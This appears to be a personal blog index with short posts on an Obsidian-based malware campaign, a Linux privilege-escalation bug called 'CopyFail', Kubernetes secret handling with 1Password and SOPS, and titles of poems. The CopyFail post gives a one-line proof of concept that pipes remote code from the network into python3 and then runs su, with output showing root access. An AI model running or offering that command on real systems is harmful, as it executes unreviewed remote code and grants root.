th0th

Is your vault safe?

Mon, 11 May 2026 00:24:41 +0000

Ref: Novel Campaign Abuses Obsidian Note-Taking App to Target Finance and Crypto Professionals with PHANTOMPULSE RAT

Is your Obsidian vault safe? note taking and knowledge management encompass many disciplines. Technology accelerates the consumption and distribution of knowledge among others. That momentum comes with risks though. Ones who wish to do harm to others find any way to manipulate & deceive for personal gain.

The threat campaign linked above is just another example of the implicit trust that comes with the sharing of knowledge.

My Laptop Got Pwn'd

Mon, 04 May 2026 21:24:41 +0000

732 bytes of Python just borked every Linux machine on earth…

I ingest alot of news and articles each day but this video from Fireship just seemed like another nothing burger.. well I was wrong.

I won’t go into detail on the vulnerability but you can verify if your Linux based systems are vulnerable by running this PoC and reviwing the associated article for more context. CopyFail:

curl https://copy.fail/exp | python3 && su

$ id
uid=0(root) gid=1000(fr3d) groups=1000(fr3d),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),104(kvm),106(netdev),111(bluetooth),113(lpadmin),116(scanner),126(libvirt),995(docker)

Wordplay

Sun, 05 Apr 2026 00:00:00 +0000

Pick a letter, any letter

Create onepassword-token For k8s

Mon, 19 Jan 2026 16:59:57 +0000

k create secret generic onepassword-connect-secret \
--from-file=./1password-credentials.json -o yaml > infrastructure/configs/base/onepassword-connect/1_secrets.yaml

kubectl create secret generic onepassword-connect-secret -n onepassword --from-literal=1password-credentials.json="$(cat ./utils/1password-credentials.json | base64)" --dry-run=client -o yaml > infrastructure/configs/base/onepassword-connect/1_secrets.yaml

kubectl create secret -n external-secrets generic onepassword-token --from-literal=token=$OP_CONNECT_TOKEN

Encrypt secrets with SOPS

Thu, 15 Jan 2026 23:09:41 +0000

Generate an age keypair and save it to age.agekey. The public key is used for encryption; keep the private key safe — you’ll need it to decrypt.

$ age-keygen -o age.agekey
Public key: age1helqcqsh9464r8chnwc2fzj8uv7vr5ntnsft0tn45v2xtz0hpfwq98cmsg

Store the private key as a Kubernetes secret in the flux-system namespace so Flux’s SOPS decryption provider can use it to decrypt manifests at apply time.

cat age.agekey |
kubectl create secret generic sops-age \
--namespace=flux-system \
--from-file=age.agekey=/dev/stdin

Encrypt a Kubernetes secret YAML in-place using SOPS. Only fields matching data or stringData are encrypted, leaving the rest of the manifest readable.

Footprints in the Sand

Tue, 30 Dec 2025 00:00:00 +0000

step into your voice

The Last Keeper

Sun, 14 Sep 2025 00:00:00 +0000

There is no love without grief

Dominion

Tue, 12 Aug 2025 00:00:00 +0000

Trust in submission

Words in Motion

Sat, 09 Aug 2025 00:00:00 +0000

My words ride at dawn

Release the Rhythm

Mon, 23 Jun 2025 00:00:00 +0000

Will you listen to your pleasure?

One Day

Wed, 21 May 2025 00:00:00 +0000

Why have hope when clarity comes in clear

Roses

Mon, 19 May 2025 00:00:00 +0000

Hold the rose, sentenced to bleed

The Sandstorm

Fri, 16 May 2025 00:00:00 +0000

There is no love without grief

30 Tips for 30 Years

Sun, 16 Feb 2025 00:00:00 +0000

I wrote this for my wife, I hope it resonates

Meditation 8 Jan 2025

Sun, 16 Feb 2025 00:00:00 +0000

Theme: Nature

Valentines Day 2025

Fri, 14 Feb 2025 00:00:00 +0000

Three poems about love